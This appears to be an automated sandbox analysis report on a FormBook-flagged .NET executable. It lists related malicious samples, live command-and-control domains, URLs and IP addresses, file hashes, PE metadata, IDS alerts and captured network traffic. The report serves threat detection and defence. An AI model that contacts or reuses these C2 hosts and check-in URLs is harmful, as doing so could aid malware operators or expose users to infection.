	20210113155320.exe	Get hash	malicious	Browse	www.ortigiarealty.com/dkk/?BZ=59qCdC3RMUvEyWKLbbpm6Z+GlV/JTwbDjS9GwZYTXRwVfK7Z9ENGl/302ncjjG4TtqPC&I6A=4hOhA0
	13012021.exe	Get hash	malicious	Browse	www.sydiifinancial.com/rbg/?-ZV4gjY=zsOc27F1WxfzCuYGlMZHORhUu2hDO+A8T5/oUCY+tOSiKp0YV+JX8kcBbP6nsiP5HbIi&-ZSl=1bgPBf
	Po-covid19 2372#w2..exe	Get hash	malicious	Browse	www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.o-tanemaki.com	DEBIT NOTE_INA101970.exe	Get hash	malicious	Browse	118.27.99.91

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
WIIUS	099898892.exe	Get hash	malicious	Browse	173.208.235.235
	SOA121520.exe	Get hash	malicious	Browse	69.197.175.2
	PaymentAdvice.html	Get hash	malicious	Browse	204.12.221.197
	IMG09122020.exe	Get hash	malicious	Browse	69.197.175.2
	dB7XQuemMc.exe	Get hash	malicious	Browse	173.208.235.235
	https://wolusozai.web.app/yuniri-%E9%AB%98%E9%BD%A2%E8%80%85-%E7%84%A1%E6%96%99%E3%82%A4%E3%83%A9%E3%82%B9%E3%83%88.html	Get hash	malicious	Browse	173.208.139.133
	Se adjunta un nuevo pedido.exe	Get hash	malicious	Browse	173.208.235.235
	138.exe	Get hash	malicious	Browse	69.30.232.138
	Quotation.exe	Get hash	malicious	Browse	204.12.231.12
	yEgeRoEgBk.exe	Get hash	malicious	Browse	69.30.203.214
	http://o4a.me/EGmJp	Get hash	malicious	Browse	173.208.207.238
	Complaint_Letter_786544411_09072020.doc	Get hash	malicious	Browse	173.208.239.119
	2svozs0lnii.exe	Get hash	malicious	Browse	173.208.141.106
	HPFBbOXwo3.exe	Get hash	malicious	Browse	69.30.203.214
	_064752.exe	Get hash	malicious	Browse	69.30.203.214
	_064751.exe	Get hash	malicious	Browse	69.30.203.214
	_001733.exe	Get hash	malicious	Browse	69.30.203.214
	_001734.exe	Get hash	malicious	Browse	69.30.203.214
	_001735.exe	Get hash	malicious	Browse	69.30.203.214
	_001734.exe	Get hash	malicious	Browse	69.30.203.214
DOSARRESTUS	zz4osC4FRa.exe	Get hash	malicious	Browse	52.128.23.153
	btVnDhh5K7.exe	Get hash	malicious	Browse	52.128.23.153
	4wCFJMHdEJ.exe	Get hash	malicious	Browse	52.128.23.153
	Inquiry-RFQ93847849-pdf.exe	Get hash	malicious	Browse	52.128.23.218
	rtgs_pdf.exe	Get hash	malicious	Browse	52.128.23.153
	SecuriteInfo.com.Variant.Razy.820883.21352.exe	Get hash	malicious	Browse	52.128.23.218
	New Purchase Order NoI-701-PDF.exe	Get hash	malicious	Browse	52.128.23.218
	2021 Additional Agreement.exe	Get hash	malicious	Browse	52.128.23.153
	wDMBDrN663.exe	Get hash	malicious	Browse	52.128.23.153
	PO#14379 - SO#146001119375 XMAS wood land.exe	Get hash	malicious	Browse	52.128.23.153
	KYC - 17DEC.xlsx	Get hash	malicious	Browse	52.128.23.153
	NEW ORDER 15DEC.xlsx	Get hash	malicious	Browse	52.128.23.153
	uM87pWnV44.exe	Get hash	malicious	Browse	52.128.23.153
	Xqgvj3afT1.exe	Get hash	malicious	Browse	52.128.23.153
	DHL DOCS..exe	Get hash	malicious	Browse	52.128.23.153
	at3nJkOFqF.exe	Get hash	malicious	Browse	52.128.23.153
	6rR1G3EcvT3djII.exe	Get hash	malicious	Browse	52.128.23.218
	http://prayersontheweb.com	Get hash	malicious	Browse	52.128.23.153
	Inv.exe	Get hash	malicious	Browse	69.172.201.218
	qAOaubZNjB.exe	Get hash	malicious	Browse	69.172.201.153
INTERQGMOInternetIncJP	sample20210113-01.xlsm	Get hash	malicious	Browse	157.7.166.26
	20210113155320.exe	Get hash	malicious	Browse	157.7.44.233
	AOA4sx8Z7l.exe	Get hash	malicious	Browse	157.7.107.201
	invoice.xlsx	Get hash	malicious	Browse	118.27.99.24
	2021 NEW PURCHASE REQUIREMENT.xlsx	Get hash	malicious	Browse	163.44.185.233
	2021 NEW PURCHASE REQUIREMENT .xlsx	Get hash	malicious	Browse	163.44.185.233
	Q52msELKeI.exe	Get hash	malicious	Browse	163.44.185.216
	099898892.exe	Get hash	malicious	Browse	163.44.239.73
	NEW PURCHASE REQUIREMENT .xlsx	Get hash	malicious	Browse	163.44.185.199
	FTH2004-005.exe	Get hash	malicious	Browse	150.95.254.16
	PO21010699XYJ.exe	Get hash	malicious	Browse	118.27.99.22
	W08347.exe	Get hash	malicious	Browse	163.44.239.73
	Nuevo pedido.exe	Get hash	malicious	Browse	150.95.255.38
	rib.exe	Get hash	malicious	Browse	150.95.54.151
	DEBIT NOTE_INA101970.exe	Get hash	malicious	Browse	118.27.99.91
	2019-2020_SOA_Payment_31 Dec2020.xlsx	Get hash	malicious	Browse	163.44.185.233
	990109.exe	Get hash	malicious	Browse	210.172.144.245
	2019-2020_SOA_Payment_22Dec2020.xlsx	Get hash	malicious	Browse	163.44.185.233
	List items.exe	Get hash	malicious	Browse	163.44.185.223
	2019-2020_SOA_Payment_21Dec2020.xlsx	Get hash	malicious	Browse	163.44.185.233

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SKM_C36821010708320.exe.log Download File
Process:	C:\Users\user\Desktop\SKM_C36821010708320.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.220259879490445
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	SKM_C36821010708320.exe
File size:	784896
MD5:	15d8096422d137c7388908bb2be61ec4
SHA1:	e67d261ef38eb251fb97a466d83c95e75d286ebe
SHA256:	fae57c2f185899220dff608004ab571822fc14cc02aa7e30b1cd5db7be4beea8
SHA512:	83d38e2e5540d1a2790f834e62bd1cc6978eae92c6d70ca875b72e0d33852473b68b36b99c4fe05e3c100283dee6353e45f907eecbb9369d730c17c5c20bb1f5
SSDEEP:	6144:SJE48vE+80jGdr3lL//L1g++DML8Rv+vOf4ikNOt/0CL5Glvd99j0ah2/a0XJtbq:SJRDpTr1rAbdN+l0hY/jDi6yx7FBq9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4c0d8a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FFEBDF3 [Wed Jan 13 09:31:31 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc0d38	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc2000	0x60c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbed90	0xbee00	False	0.674781024885	data	7.22890252229	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xc2000	0x60c	0x800	False	0.3271484375	data	3.42876549124	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc4000	0xc	0x200	False	0.041015625	data	0.0776331623432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xc2090	0x37c	data
RT_MANIFEST	0xc241c	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2011
Assembly Version	1.0.0.0
InternalName	ServerObjectTerminatorSink.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	FileReplacement
ProductVersion	1.0.0.0
FileDescription	FileReplacement
OriginalFilename	ServerObjectTerminatorSink.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/13/21-21:59:40.823686	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49745	34.102.136.180	192.168.2.3
01/13/21-22:00:22.935166	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.3	103.29.215.252
01/13/21-22:00:22.935166	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.3	103.29.215.252
01/13/21-22:00:22.935166	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.3	103.29.215.252
01/13/21-22:00:43.833502	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49750	80	192.168.2.3	52.128.23.153
01/13/21-22:00:43.833502	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49750	80	192.168.2.3	52.128.23.153
01/13/21-22:00:43.833502	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49750	80	192.168.2.3	52.128.23.153

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 21:59:19.764673948 CET	49744	80	192.168.2.3	118.27.99.91
Jan 13, 2021 21:59:20.062277079 CET	80	49744	118.27.99.91	192.168.2.3
Jan 13, 2021 21:59:20.065541029 CET	49744	80	192.168.2.3	118.27.99.91
Jan 13, 2021 21:59:20.065716028 CET	49744	80	192.168.2.3	118.27.99.91
Jan 13, 2021 21:59:20.363244057 CET	80	49744	118.27.99.91	192.168.2.3
Jan 13, 2021 21:59:20.363631010 CET	80	49744	118.27.99.91	192.168.2.3
Jan 13, 2021 21:59:20.363652945 CET	80	49744	118.27.99.91	192.168.2.3
Jan 13, 2021 21:59:20.363843918 CET	49744	80	192.168.2.3	118.27.99.91
Jan 13, 2021 21:59:20.363879919 CET	49744	80	192.168.2.3	118.27.99.91
Jan 13, 2021 21:59:20.661537886 CET	80	49744	118.27.99.91	192.168.2.3
Jan 13, 2021 21:59:40.644495964 CET	49745	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:59:40.684381008 CET	80	49745	34.102.136.180	192.168.2.3
Jan 13, 2021 21:59:40.684509993 CET	49745	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:59:40.684653044 CET	49745	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:59:40.724306107 CET	80	49745	34.102.136.180	192.168.2.3
Jan 13, 2021 21:59:40.823685884 CET	80	49745	34.102.136.180	192.168.2.3
Jan 13, 2021 21:59:40.823740959 CET	80	49745	34.102.136.180	192.168.2.3
Jan 13, 2021 21:59:40.823908091 CET	49745	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:59:40.823968887 CET	49745	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:59:40.863786936 CET	80	49745	34.102.136.180	192.168.2.3
Jan 13, 2021 22:00:01.340078115 CET	49748	80	192.168.2.3	69.30.217.211
Jan 13, 2021 22:00:01.499378920 CET	80	49748	69.30.217.211	192.168.2.3
Jan 13, 2021 22:00:01.499552011 CET	49748	80	192.168.2.3	69.30.217.211
Jan 13, 2021 22:00:01.499761105 CET	49748	80	192.168.2.3	69.30.217.211
Jan 13, 2021 22:00:01.658951998 CET	80	49748	69.30.217.211	192.168.2.3
Jan 13, 2021 22:00:01.691947937 CET	80	49748	69.30.217.211	192.168.2.3
Jan 13, 2021 22:00:01.691981077 CET	80	49748	69.30.217.211	192.168.2.3
Jan 13, 2021 22:00:01.691993952 CET	80	49748	69.30.217.211	192.168.2.3
Jan 13, 2021 22:00:01.692003012 CET	80	49748	69.30.217.211	192.168.2.3
Jan 13, 2021 22:00:01.692167997 CET	49748	80	192.168.2.3	69.30.217.211
Jan 13, 2021 22:00:01.692286968 CET	49748	80	192.168.2.3	69.30.217.211
Jan 13, 2021 22:00:22.716034889 CET	49749	80	192.168.2.3	103.29.215.252
Jan 13, 2021 22:00:22.934926987 CET	80	49749	103.29.215.252	192.168.2.3
Jan 13, 2021 22:00:22.935055971 CET	49749	80	192.168.2.3	103.29.215.252
Jan 13, 2021 22:00:22.935165882 CET	49749	80	192.168.2.3	103.29.215.252
Jan 13, 2021 22:00:23.153749943 CET	80	49749	103.29.215.252	192.168.2.3
Jan 13, 2021 22:00:23.431721926 CET	49749	80	192.168.2.3	103.29.215.252
Jan 13, 2021 22:00:23.533673048 CET	80	49749	103.29.215.252	192.168.2.3
Jan 13, 2021 22:00:23.533711910 CET	80	49749	103.29.215.252	192.168.2.3
Jan 13, 2021 22:00:23.533765078 CET	49749	80	192.168.2.3	103.29.215.252
Jan 13, 2021 22:00:23.534135103 CET	49749	80	192.168.2.3	103.29.215.252
Jan 13, 2021 22:00:23.650556087 CET	80	49749	103.29.215.252	192.168.2.3
Jan 13, 2021 22:00:23.652575016 CET	49749	80	192.168.2.3	103.29.215.252
Jan 13, 2021 22:00:43.782654047 CET	49750	80	192.168.2.3	52.128.23.153
Jan 13, 2021 22:00:43.833174944 CET	80	49750	52.128.23.153	192.168.2.3
Jan 13, 2021 22:00:43.833359957 CET	49750	80	192.168.2.3	52.128.23.153
Jan 13, 2021 22:00:43.833502054 CET	49750	80	192.168.2.3	52.128.23.153
Jan 13, 2021 22:00:43.884052038 CET	80	49750	52.128.23.153	192.168.2.3
Jan 13, 2021 22:00:43.884119034 CET	80	49750	52.128.23.153	192.168.2.3
Jan 13, 2021 22:00:43.884176016 CET	80	49750	52.128.23.153	192.168.2.3
Jan 13, 2021 22:00:43.884228945 CET	80	49750	52.128.23.153	192.168.2.3
Jan 13, 2021 22:00:43.884279966 CET	80	49750	52.128.23.153	192.168.2.3
Jan 13, 2021 22:00:43.884332895 CET	80	49750	52.128.23.153	192.168.2.3
Jan 13, 2021 22:00:43.884383917 CET	80	49750	52.128.23.153	192.168.2.3
Jan 13, 2021 22:00:43.884435892 CET	49750	80	192.168.2.3	52.128.23.153
Jan 13, 2021 22:00:43.884445906 CET	80	49750	52.128.23.153	192.168.2.3
Jan 13, 2021 22:00:43.884476900 CET	49750	80	192.168.2.3	52.128.23.153
Jan 13, 2021 22:00:43.884536028 CET	80	49750	52.128.23.153	192.168.2.3
Jan 13, 2021 22:00:43.884541988 CET	49750	80	192.168.2.3	52.128.23.153
Jan 13, 2021 22:00:43.884649992 CET	49750	80	192.168.2.3	52.128.23.153
Jan 13, 2021 22:00:43.884722948 CET	49750	80	192.168.2.3	52.128.23.153

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 21:58:04.597759008 CET	58361	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:04.654330015 CET	53	58361	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:26.100498915 CET	63492	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:26.151179075 CET	53	63492	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:28.710925102 CET	60831	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:28.771922112 CET	53	60831	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:29.692300081 CET	60100	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:29.743005991 CET	53	60100	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:30.852941036 CET	53195	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:30.901132107 CET	53	53195	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:31.654427052 CET	50141	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:31.705317020 CET	53	50141	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:32.730218887 CET	53023	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:32.778139114 CET	53	53023	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:33.189100981 CET	49563	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:33.247492075 CET	53	49563	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:33.688707113 CET	51352	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:33.736644983 CET	53	51352	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:34.499298096 CET	59349	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:34.547305107 CET	53	59349	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:35.536468029 CET	57084	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:35.584412098 CET	53	57084	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:36.586968899 CET	58823	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:36.634871006 CET	53	58823	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:36.673096895 CET	57568	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:36.721375942 CET	53	57568	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:37.548713923 CET	50540	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:37.599667072 CET	53	50540	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:38.793415070 CET	54366	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:38.841593027 CET	53	54366	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:39.852374077 CET	53034	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:39.900167942 CET	53	53034	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:52.173333883 CET	57762	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:52.231214046 CET	53	57762	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:54.228147030 CET	55435	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:54.276068926 CET	53	55435	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:54.375669003 CET	50713	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:54.426413059 CET	53	50713	8.8.8.8	192.168.2.3
Jan 13, 2021 21:58:55.299812078 CET	56132	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:58:55.371507883 CET	53	56132	8.8.8.8	192.168.2.3
Jan 13, 2021 21:59:05.499865055 CET	58987	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:59:05.556144953 CET	53	58987	8.8.8.8	192.168.2.3
Jan 13, 2021 21:59:13.778987885 CET	56579	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:59:13.839099884 CET	53	56579	8.8.8.8	192.168.2.3
Jan 13, 2021 21:59:16.089072943 CET	60633	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:59:16.153364897 CET	53	60633	8.8.8.8	192.168.2.3
Jan 13, 2021 21:59:19.451765060 CET	61292	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:59:19.759021044 CET	53	61292	8.8.8.8	192.168.2.3
Jan 13, 2021 21:59:40.582362890 CET	63619	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:59:40.643111944 CET	53	63619	8.8.8.8	192.168.2.3
Jan 13, 2021 21:59:41.293983936 CET	64938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:59:41.342092037 CET	53	64938	8.8.8.8	192.168.2.3
Jan 13, 2021 21:59:43.998179913 CET	61946	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:59:44.067198992 CET	53	61946	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:01.014651060 CET	64910	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:01.338017941 CET	53	64910	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:22.347306967 CET	52123	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:22.714339018 CET	53	52123	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:43.619170904 CET	56130	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:43.780431032 CET	53	56130	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:52.123898029 CET	56338	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:52.180207968 CET	53	56338	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:52.662022114 CET	59420	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:52.718538046 CET	53	59420	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:53.202836037 CET	58784	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:53.259459972 CET	53	58784	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:53.641834021 CET	63978	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:53.689811945 CET	53	63978	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:54.207439899 CET	62938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:54.258227110 CET	53	62938	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:54.730747938 CET	55708	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:54.787307024 CET	53	55708	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:55.349493027 CET	56803	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:55.406019926 CET	53	56803	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:56.255387068 CET	57145	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:56.303550959 CET	53	57145	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:56.953993082 CET	55359	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:57.018237114 CET	53	55359	8.8.8.8	192.168.2.3
Jan 13, 2021 22:00:57.418026924 CET	58306	53	192.168.2.3	8.8.8.8
Jan 13, 2021 22:00:57.465905905 CET	53	58306	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 21:59:19.451765060 CET	192.168.2.3	8.8.8.8	0x92cb	Standard query (0)	www.o-tanemaki.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:59:40.582362890 CET	192.168.2.3	8.8.8.8	0x4542	Standard query (0)	www.idahofallsobituaries.com	A (IP address)	IN (0x0001)
Jan 13, 2021 22:00:01.014651060 CET	192.168.2.3	8.8.8.8	0x155d	Standard query (0)	www.bhscsh.com	A (IP address)	IN (0x0001)
Jan 13, 2021 22:00:22.347306967 CET	192.168.2.3	8.8.8.8	0xcce9	Standard query (0)	www.sheilataman.com	A (IP address)	IN (0x0001)
Jan 13, 2021 22:00:43.619170904 CET	192.168.2.3	8.8.8.8	0x3fd9	Standard query (0)	www.ehealthla.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 21:59:19.759021044 CET	8.8.8.8	192.168.2.3	0x92cb	No error (0)	www.o-tanemaki.com		118.27.99.91	A (IP address)	IN (0x0001)
Jan 13, 2021 21:59:40.643111944 CET	8.8.8.8	192.168.2.3	0x4542	No error (0)	www.idahofallsobituaries.com	idahofallsobituaries.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:59:40.643111944 CET	8.8.8.8	192.168.2.3	0x4542	No error (0)	idahofallsobituaries.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 22:00:01.338017941 CET	8.8.8.8	192.168.2.3	0x155d	No error (0)	www.bhscsh.com		69.30.217.211	A (IP address)	IN (0x0001)
